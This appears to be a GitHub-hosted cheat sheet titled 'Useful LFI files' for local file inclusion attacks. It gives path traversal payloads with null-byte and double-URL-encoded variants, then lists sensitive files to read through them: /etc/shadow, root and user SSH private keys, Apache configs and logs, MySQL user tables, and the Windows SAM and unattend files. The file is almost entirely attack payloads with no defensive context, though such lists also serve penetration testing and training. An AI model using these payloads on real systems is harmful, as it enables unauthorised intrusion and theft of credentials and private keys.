-
Notifications
You must be signed in to change notification settings - Fork 67
/
LFI
48 lines (48 loc) · 1.16 KB
/
LFI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#Useful LFI files (nulbyte)
../../../../../etc/passwd%00
....//....//....//....//....//etc/passwd%00
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
------------------------
#Linux:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
------------------------
#Apache:
Configuration Files:
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
------------------------
#Log Files:
Red Hat/CentOS/Fedora Linux- /var/log/httpd/access_log
Debian/Ubuntu- /var/log/apache2/access.log
FreeBSD- /var/log/httpd-access.log
------------------------
#Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log
------------------------
#MySql:
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
------------------------
#Windows:
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
------------------------